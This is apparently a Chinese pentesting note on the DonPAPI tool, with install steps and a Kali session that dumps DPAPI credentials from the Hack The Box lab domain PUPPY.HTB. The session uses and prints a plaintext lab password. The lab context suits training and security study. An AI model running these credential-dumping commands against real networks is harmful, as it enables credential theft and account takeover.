【DPAPI】DonPAPI
DonPAPI是一个用python编写的工具,可以用于远程导出 DPAPI 凭据。它支持“哈希传递(Pass-The-Hash)”、“票据传递(pass-the-ticket)”等技术。
0.1. 安装
#安装依赖
apt install -y python3-dev libxml2-dev libxslt1-dev zlib1g-dev gcc
pipx install donpapi 或者 pip install donpapi
DonPAPI.py 'domain'/'username':'password'@<'targetName' or 'address/mask'>
donpapi gui --bind 0.0.0.0 --port 8999
┌──(root㉿kali)-[~/Desktop/htb/season8/Puppy]
└─# donpapi collect -u steph.cooper -p 'ChefSteph2025!' -d PUPPY.HTB -t ALL
[💀] [+] DonPAPI Version 2.0.1
[💀] [+] Output directory at /root/.donpapi
[PUPPY.HTB] [+] Collecting every hostnames from PUPPY.HTB
[PUPPY.HTB] [+] Loaded 1 targets
[PUPPY.HTB] [+] Recover file available at /root/.donpapi/recover/recover_1747865372
DonPAPI running against 1 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
┌──(root㉿kali)-[~/Desktop/htb/season8/Puppy]
└─# cat /root/.donpapi/recover/recover_1747865372
{"v": 0, "output_directory": null, "action": "collect", "keep_collecting": null, "threads": 50, "no_config": false, "target": ["ALL"], "domain": "PUPPY.HTB", "username": "steph.cooper", "password": "ChefSteph2025!", "hashes": null, "no_pass": false, "k": false, "aesKey": null, "laps": false, "dc_ip": null, "recover_file": null, "collectors": "All", "no_remoteops": false, "fetch_pvk": false, "pvkfile": null, "pwdfile": null, "ntfile": null, "mkfile": null, "lmhash": "", "nthash": ""}
